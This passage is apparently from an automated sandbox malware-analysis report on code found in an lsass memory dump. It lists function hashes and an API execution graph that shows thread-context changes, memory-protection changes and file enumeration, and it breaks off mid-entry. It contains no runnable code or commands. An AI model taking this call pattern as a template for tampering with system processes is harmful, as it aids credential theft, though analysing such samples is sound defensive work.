                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: BB617972508BC886EB619B15F4447DAB7B0FB95B98F084215EB9C07B9BCB78D1D6CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 35267cd655bf9caf2e33435e48c99650ca7eaeacb93b2f1d621d557c5748305f
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: A451083620CF8A51E624DE25B4543EA6B71FB85B90F4C8025CD5D53B8BDEB9C48AC740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 72de2532ea490e7dffc4b3d9ad32238eb81dd84d989dfa065ece3d23a1744465
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: 5741F532629F8886E710CF65F4447DAB7B0FB58784F884121EE4D87799EB78C482CB80
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 2b9d1bb40f4fa3f8fa971c5af465a33c2449e1adeffbe0ac49bef364339b357f
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 34111632218F8482EB218B25F444699B7F5FB88B94F584620EB8D07B69DF78C592CB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 721abd91f3690e52f6e2d03652fbd8b305912301ab44bd746d91c8c08f8d5257
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: CC115B21A15F8886EA14CB66B80429977B0FB88FD0F5C4125DF4E53766EF78D4828380
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 8be371d4c702924ae43c8205af8ae46fcb34ac841cdc9e9091f12d0e275119f0
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 71E03931602A089AE7148B62F80838936F1EB88B05F488024CA0907351EF7D84DA87C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: a3c236485addc4aadda2de53174d0080134f033a9d576b6ac258d18ee10dc9bc
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: 77E0ED71611A089BE7189B62F80429976B1FF88B15F488064CA0907311EE3C84DA9690

                                                  Execution Graph

                                                  Execution Coverage:1.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1393
                                                  Total number of Limit Nodes:7
                                                  execution_graph 8200 22f4b933960 8210 22f4b928ca0 8200->8210 8202 22f4b933988 8204 22f4b929324 _CreateFrameInfo 9 API calls 8205 22f4b933998 8204->8205 8206 22f4b929324 _CreateFrameInfo 9 API calls 8205->8206 8207 22f4b9339a1 8206->8207 8208 22f4b92c2f4 14 API calls 8207->8208 8209 22f4b9339aa 8208->8209 8212 22f4b928cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8210->8212 8211 22f4b928dd1 8211->8202 8211->8204 8212->8211 8213 22f4b928d94 RtlUnwindEx 8212->8213 8213->8212 8551 22f4b9306e0 8552 22f4b9306e9 8551->8552 8556 22f4b9306f9 8551->8556 8553 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8552->8553 8554 22f4b9306ee 8553->8554 8555 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8554->8555 8555->8556 8214 22f4b927f60 8215 22f4b927f81 8214->8215 8216 22f4b927f7c 8214->8216 8218 22f4b928090 8216->8218 8219 22f4b9280b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8218->8219 8220 22f4b928127 8218->8220 8219->8220 8220->8215 8800 22f4b93465f 8801 22f4b9346e2 8800->8801 8802 22f4b934677 8800->8802 8802->8801 8803 22f4b929324 _CreateFrameInfo 9 API calls 8802->8803 8804 22f4b9346c4 8803->8804 8805 22f4b929324 _CreateFrameInfo 9 API calls 8804->8805 8806 22f4b9346d9 8805->8806 8807 22f4b92c2f4 14 API calls 8806->8807 8807->8801 7562 22f4b9263e3 7563 22f4b9263f0 7562->7563 7564 22f4b9263fc GetThreadContext 7563->7564 7569 22f4b92655a 7563->7569 7565 22f4b926422 7564->7565 7564->7569 7565->7569 7572 22f4b926449 7565->7572 7566 22f4b926581 VirtualProtect FlushInstructionCache 7566->7569 7567 22f4b92663e 7568 22f4b92665e 7567->7568 7580 22f4b924b20 7567->7580 7584 22f4b925530 GetCurrentProcess 7568->7584 7569->7566 7569->7567 7570 22f4b9264cd 7572->7570 7575 22f4b9264a6 SetThreadContext 7572->7575 7574 22f4b926663 7576 22f4b926677 ResumeThread 7574->7576 7577 22f4b9266b7 7574->7577 7575->7570 7576->7574 7588 22f4b928070 7577->7588 7582 22f4b924b3c 7580->7582 7581 22f4b924b9f 7581->7568 7582->7581 7583 22f4b924b52 VirtualFree 7582->7583 7583->7582 7585 22f4b92554c 7584->7585 7586 22f4b925562 VirtualProtect FlushInstructionCache 7585->7586 7587 22f4b925593 7585->7587 7586->7585 7587->7574 7589 22f4b928079 7588->7589 7590 22f4b9266ff 7589->7590 7591 22f4b928848 IsProcessorFeaturePresent 7589->7591 7592 22f4b928860 7591->7592 7597 22f4b92891c RtlCaptureContext 7592->7597 7598 22f4b928936 RtlLookupFunctionEntry 7597->7598 7599 22f4b928873 7598->7599 7600 22f4b92894c RtlVirtualUnwind 7598->7600 7601 22f4b928814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7599->7601 7600->7598 7600->7599 7602 22f4b92f3e4 7603 22f4b92f41d 7602->7603 7605 22f4b92f3ee 7602->7605 7604 22f4b92f403 FreeLibrary 7604->7605 7605->7603 7605->7604 7606 22f4b9333e4 7607 22f4b9333f5 CloseHandle 7606->7607 7608 22f4b9333fb 7606->7608 7607->7608 7609 22f4b92b7ea 7621 22f4b92c2f4 7609->7621 7624 22f4b92cab0 7621->7624 7623 22f4b92c2fd 7632 22f4b92cb10 7624->7632 7626 22f4b92cab9 7627 22f4b92cabe 7626->7627 7628 22f4b92cae8 FlsGetValue 7626->7628 7630 22f4b92cae4 7626->7630 7627->7623 7628->7630 7629 22f4b92cafe 7629->7623 7630->7629 7641 22f4b92c940 GetLastError 7630->7641 7633 22f4b92cb59 GetLastError 7632->7633 7637 22f4b92cb2f Concurrency::details::SchedulerProxy::DeleteThis 7632->7637 7634 22f4b92cb6c 7633->7634 7636 22f4b92cb8a SetLastError 7634->7636 7638 22f4b92cb87 7634->7638 7639 22f4b92c940 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7634->7639 7635 22f4b92cb54 7635->7626 7636->7635 7637->7635 7640 22f4b92c940 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7637->7640 7638->7636 7639->7638 7640->7635 7642 22f4b92c966 7641->7642 7643 22f4b92c96c SetLastError 7642->7643 7659 22f4b92d220 7642->7659 7644 22f4b92c9e5 7643->7644 7644->7629 7647 22f4b92c9a5 FlsSetValue 7650 22f4b92c9b1 FlsSetValue 7647->7650 7651 22f4b92c9c8 7647->7651 7648 22f4b92c995 FlsSetValue 7666 22f4b92d2a0 7648->7666 7654 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 7650->7654 7672 22f4b92c758 7651->7672 7656 22f4b92c9c6 SetLastError 7654->7656 7656->7644 7665 22f4b92d231 Concurrency::details::SchedulerProxy::DeleteThis 7659->7665 7660 22f4b92d282 7680 22f4b92d1f4 7660->7680 7661 22f4b92d266 HeapAlloc 7663 22f4b92c987 7661->7663 7661->7665 7663->7647 7663->7648 7665->7660 7665->7661 7677 22f4b92b470 7665->7677 7667 22f4b92d2a5 HeapFree 7666->7667 7668 22f4b92c9a3 7666->7668 7667->7668 7669 22f4b92d2c0 GetLastError 7667->7669 7668->7643 7670 22f4b92d2cd Concurrency::details::SchedulerProxy::DeleteThis 7669->7670 7671 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7670->7671 7671->7668 7689 22f4b92c630 7672->7689 7683 22f4b92b4c0 7677->7683 7681 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7680->7681 7682 22f4b92d1fd 7681->7682 7682->7663 7688 22f4b92c558 EnterCriticalSection 7683->7688 7701 22f4b92c558 EnterCriticalSection 7689->7701 7703 22f4b9227e8 7704 22f4b922867 7703->7704 7705 22f4b9228c9 GetFileType 7704->7705 7717 22f4b922998 7704->7717 7706 22f4b9228d7 StrCpyW 7705->7706 7707 22f4b9228ed 7705->7707 7708 22f4b9228fc 7706->7708 7719 22f4b921ad4 GetFinalPathNameByHandleW 7707->7719 7712 22f4b92299d 7708->7712 7716 22f4b922906 7708->7716 7710 22f4b923f88 StrCmpNIW 7710->7712 7712->7710 7713 22f4b923708 4 API calls 7712->7713 7714 22f4b921dd4 2 API calls 7712->7714 7712->7717 7713->7712 7714->7712 7716->7717 7724 22f4b923f88 7716->7724 7727 22f4b923708 StrCmpIW 7716->7727 7731 22f4b921dd4 7716->7731 7720 22f4b921b3d 7719->7720 7721 22f4b921afe StrCmpNIW 7719->7721 7720->7708 7721->7720 7722 22f4b921b18 lstrlenW 7721->7722 7722->7720 7723 22f4b921b2a StrCpyW 7722->7723 7723->7720 7725 22f4b923f95 StrCmpNIW 7724->7725 7726 22f4b923faa 7724->7726 7725->7726 7726->7716 7728 22f4b923751 PathCombineW 7727->7728 7729 22f4b92373a StrCpyW StrCatW 7727->7729 7730 22f4b92375a 7728->7730 7729->7730 7730->7716 7732 22f4b921df4 7731->7732 7733 22f4b921deb 7731->7733 7732->7716 7734 22f4b921530 2 API calls 7733->7734 7734->7732 8557 22f4b92acec 8560 22f4b9290c0 8557->8560 8559 22f4b92ad15 8561 22f4b929116 8560->8561 8562 22f4b9290e1 8560->8562 8561->8559 8562->8561 8564 22f4b92c328 8562->8564 8565 22f4b92c33f 8564->8565 8566 22f4b92c335 8564->8566 8567 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8565->8567 8566->8565 8571 22f4b92c35a 8566->8571 8568 22f4b92c346 8567->8568 8569 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8568->8569 8570 22f4b92c352 8569->8570 8570->8561 8571->8570 8572 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8571->8572 8572->8568 7735 22f4b9319d0 7738 22f4b92e864 7735->7738 7739 22f4b92e871 7738->7739 7743 22f4b92e8b6 7738->7743 7744 22f4b92cacc 7739->7744 7741 22f4b92e8a0 7749 22f4b92e53c 7741->7749 7745 22f4b92cae8 FlsGetValue 7744->7745 7747 22f4b92cae4 7744->7747 7745->7747 7746 22f4b92cafe 7746->7741 7747->7746 7748 22f4b92c940 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7747->7748 7748->7746 7772 22f4b92e7ac 7749->7772 7756 22f4b92e5a7 7757 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7756->7757 7771 22f4b92e58e 7757->7771 7758 22f4b92e5b6 7758->7758 7798 22f4b92e8e0 7758->7798 7761 22f4b92e6b2 7762 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7761->7762 7764 22f4b92e6b7 7762->7764 7763 22f4b92e6cc 7765 22f4b92e70d 7763->7765 7768 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7763->7768 7767 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7764->7767 7766 22f4b92e774 7765->7766 7809 22f4b92e05c 7765->7809 7770 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7766->7770 7767->7771 7768->7765 7770->7771 7771->7743 7773 22f4b92e7cf 7772->7773 7778 22f4b92e7d9 7773->7778 7824 22f4b92c558 EnterCriticalSection 7773->7824 7779 22f4b92e571 7778->7779 7781 22f4b92cacc 14 API calls 7778->7781 7784 22f4b92e22c 7779->7784 7782 22f4b92e8a0 7781->7782 7783 22f4b92e53c 56 API calls 7782->7783 7783->7779 7825 22f4b92dd78 7784->7825 7787 22f4b92e25e 7789 22f4b92e273 7787->7789 7790 22f4b92e263 GetACP 7787->7790 7788 22f4b92e24c GetOEMCP 7788->7789 7789->7771 7791 22f4b92c5d0 7789->7791 7790->7789 7792 22f4b92c61b 7791->7792 7796 22f4b92c5df Concurrency::details::SchedulerProxy::DeleteThis 7791->7796 7794 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7792->7794 7793 22f4b92c602 HeapAlloc 7795 22f4b92c619 7793->7795 7793->7796 7794->7795 7795->7756 7795->7758 7796->7792 7796->7793 7797 22f4b92b470 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 7796->7797 7797->7796 7799 22f4b92e22c 16 API calls 7798->7799 7800 22f4b92e91b 7799->7800 7801 22f4b92ea71 7800->7801 7803 22f4b92e958 IsValidCodePage 7800->7803 7808 22f4b92e972 7800->7808 7802 22f4b928070 _invalid_parameter_noinfo 8 API calls 7801->7802 7804 22f4b92e6a9 7802->7804 7803->7801 7805 22f4b92e969 7803->7805 7804->7761 7804->7763 7806 22f4b92e998 GetCPInfo 7805->7806 7805->7808 7806->7801 7806->7808 7854 22f4b92e344 7808->7854 7952 22f4b92c558 EnterCriticalSection 7809->7952 7826 22f4b92dd97 7825->7826 7827 22f4b92dd9c 7825->7827 7826->7787 7826->7788 7827->7826 7828 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 7827->7828 7829 22f4b92ddb7 7828->7829 7833 22f4b92ffb4 7829->7833 7834 22f4b92ddda 7833->7834 7835 22f4b92ffc9 7833->7835 7837 22f4b930020 7834->7837 7835->7834 7841 22f4b930a40 7835->7841 7838 22f4b930035 7837->7838 7839 22f4b930048 7837->7839 7838->7839 7851 22f4b92e8c4 7838->7851 7839->7826 7842 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 7841->7842 7843 22f4b930a4f 7842->7843 7849 22f4b930a95 7843->7849 7850 22f4b92c558 EnterCriticalSection 7843->7850 7849->7834 7852 22f4b92cab0 _invalid_parameter_noinfo 14 API calls 7851->7852 7853 22f4b92e8cd 7852->7853 7855 22f4b92e38f GetCPInfo 7854->7855 7864 22f4b92e485 7854->7864 7860 22f4b92e3a2 7855->7860 7855->7864 7856 22f4b928070 _invalid_parameter_noinfo 8 API calls 7858 22f4b92e524 7856->7858 7858->7801 7865 22f4b931474 7860->7865 7864->7856 7866 22f4b92dd78 14 API calls 7865->7866 7867 22f4b9314b6 7866->7867 7885 22f4b92ec58 7867->7885 7887 22f4b92ec61 MultiByteToWideChar 7885->7887 8230 22f4b93494f 8231 22f4b934968 8230->8231 8232 22f4b93495e 8230->8232 8234 22f4b92c5ac LeaveCriticalSection 8232->8234 8576 22f4b92b0d4 8578 22f4b92b007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8576->8578 8577 22f4b92b0fb 8579 22f4b929324 _CreateFrameInfo 9 API calls 8577->8579 8578->8577 8581 22f4b92b10b __FrameHandler3::GetHandlerSearchState 8578->8581 8583 22f4b9299cc 9 API calls Is_bad_exception_allowed 8578->8583 8585 22f4b9299f4 8578->8585 8580 22f4b92b100 8579->8580 8580->8581 8582 22f4b929324 _CreateFrameInfo 9 API calls 8580->8582 8582->8581 8583->8578 8586 22f4b929324 _CreateFrameInfo 9 API calls 8585->8586 8587 22f4b929a02 8586->8587 8587->8578 8808 22f4b922e54 8810 22f4b922ea8 8808->8810 8809 22f4b922ec3 8810->8809 8812 22f4b9237f4 8810->8812 8813 22f4b92388a 8812->8813 8816 22f4b923819 8812->8816 8813->8809 8814 22f4b923f88 StrCmpNIW 8814->8816 8815 22f4b921e08 StrCmpIW StrCmpW 8815->8816 8816->8813 8816->8814 8816->8815 7953 22f4b92c1d8 7954 22f4b92c1f1 7953->7954 7955 22f4b92c209 7953->7955 7954->7955 7956 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 7954->7956 7956->7955 8817 22f4b92d658 8818 22f4b92d67d 8817->8818 8822 22f4b92d694 8817->8822 8819 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8818->8819 8821 22f4b92d682 8819->8821 8820 22f4b92d724 8825 22f4b92bb54 13 API calls 8820->8825 8823 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8821->8823 8822->8820 8832 22f4b92d7b6 8822->8832 8834 22f4b92d6da 8822->8834 8850 22f4b92d894 8822->8850 8912 22f4b92da18 8822->8912 8824 22f4b92d68d 8823->8824 8826 22f4b92d77c 8825->8826 8828 22f4b92d784 8826->8828 8838 22f4b92d7d7 8826->8838 8831 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8828->8831 8830 22f4b92d836 8833 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8830->8833 8835 22f4b92d78b 8831->8835 8837 22f4b92d6fd 8832->8837 8841 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8832->8841 8836 22f4b92d841 8833->8836 8834->8837 8842 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8834->8842 8835->8837 8843 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8835->8843 8840 22f4b92d85a 8836->8840 8844 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8836->8844 8839 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8837->8839 8838->8830 8838->8838 8847 22f4b92d87c 8838->8847 8949 22f4b930eb8 8838->8949 8839->8824 8845 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8840->8845 8841->8832 8842->8834 8843->8835 8844->8836 8845->8824 8848 22f4b92d06c _invalid_parameter_noinfo 17 API calls 8847->8848 8849 22f4b92d891 8848->8849 8851 22f4b92d8c2 8850->8851 8851->8851 8852 22f4b92d8de 8851->8852 8853 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8851->8853 8852->8822 8854 22f4b92d90d 8853->8854 8855 22f4b92d926 8854->8855 8856 22f4b930eb8 38 API calls 8854->8856 8857 22f4b930eb8 38 API calls 8855->8857 8859 22f4b92d9fc 8855->8859 8856->8855 8858 22f4b92d943 8857->8858 8858->8859 8860 22f4b92d97f 8858->8860 8862 22f4b92d962 8858->8862 8863 22f4b92d98d 8858->8863 8861 22f4b92d06c _invalid_parameter_noinfo 17 API calls 8859->8861 8865 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8860->8865 8873 22f4b92da17 8861->8873 8864 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8862->8864 8866 22f4b92d977 8863->8866 8958 22f4b92eee0 8863->8958 8868 22f4b92d96d 8864->8868 8865->8859 8866->8860 8867 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8866->8867 8867->8860 8871 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8868->8871 8870 22f4b92da7a 8875 22f4b92da8c 8870->8875 8881 22f4b92daa1 8870->8881 8871->8866 8872 22f4b92d9b5 8876 22f4b92d9d0 8872->8876 8877 22f4b92d9ba 8872->8877 8873->8870 8967 22f4b9313d8 8873->8967 8879 22f4b92d894 52 API calls 8875->8879 8878 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8876->8878 8880 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8877->8880 8878->8860 8894 22f4b92da9c 8879->8894 8880->8866 8883 22f4b92dd78 14 API calls 8881->8883 8882 22f4b928070 _invalid_parameter_noinfo 8 API calls 8884 22f4b92dd64 8882->8884 8885 22f4b92db0b 8883->8885 8884->8822 8886 22f4b92db1a 8885->8886 8887 22f4b92f198 9 API calls 8885->8887 8976 22f4b92d30c 8886->8976 8887->8886 8890 22f4b92dba8 8891 22f4b92d894 52 API calls 8890->8891 8892 22f4b92dbb8 8891->8892 8892->8894 8895 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8892->8895 8893 22f4b92dd78 14 API calls 8899 22f4b92dbd2 8893->8899 8894->8882 8895->8894 8896 22f4b92f198 9 API calls 8896->8899 8898 22f4b92d894 52 API calls 8898->8899 8899->8893 8899->8896 8899->8898 8900 22f4b92dcc8 FindNextFileW 8899->8900 8901 22f4b92dd2a 8899->8901 8907 22f4b92d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8899->8907 8998 22f4b92d4ac 8899->8998 8900->8899 8902 22f4b92dce0 8900->8902 8904 22f4b92dd38 FindClose 8901->8904 8905 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8901->8905 8903 22f4b92dd0c FindClose 8902->8903 9020 22f4b930b20 8902->9020 8903->8894 8909 22f4b92dd1c 8903->8909 8904->8894 8906 22f4b92dd48 8904->8906 8905->8904 8910 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8906->8910 8907->8899 8911 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8909->8911 8910->8894 8911->8894 8913 22f4b92da7a 8912->8913 8914 22f4b92da58 8912->8914 8916 22f4b92da8c 8913->8916 8919 22f4b92daa1 8913->8919 8914->8913 8915 22f4b9313d8 38 API calls 8914->8915 8915->8914 8917 22f4b92d894 56 API calls 8916->8917 8918 22f4b92da9c 8917->8918 8920 22f4b928070 _invalid_parameter_noinfo 8 API calls 8918->8920 8921 22f4b92dd78 14 API calls 8919->8921 8922 22f4b92dd64 8920->8922 8923 22f4b92db0b 8921->8923 8922->8822 8924 22f4b92db1a 8923->8924 8925 22f4b92f198 9 API calls 8923->8925 8926 22f4b92d30c 16 API calls 8924->8926 8925->8924 8927 22f4b92db7b FindFirstFileExW 8926->8927 8928 22f4b92dba8 8927->8928 8936 22f4b92dbd2 8927->8936 8929 22f4b92d894 56 API calls 8928->8929 8930 22f4b92dbb8 8929->8930 8930->8918 8932 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8930->8932 8931 22f4b92dd78 14 API calls 8931->8936 8932->8918 8933 22f4b92f198 9 API calls 8933->8936 8934 22f4b92d4ac 16 API calls 8934->8936 8935 22f4b92d894 56 API calls 8935->8936 8936->8931 8936->8933 8936->8934 8936->8935 8937 22f4b92dcc8 FindNextFileW 8936->8937 8938 22f4b92dd2a 8936->8938 8944 22f4b92d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 8936->8944 8937->8936 8939 22f4b92dce0 8937->8939 8941 22f4b92dd38 FindClose 8938->8941 8942 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API 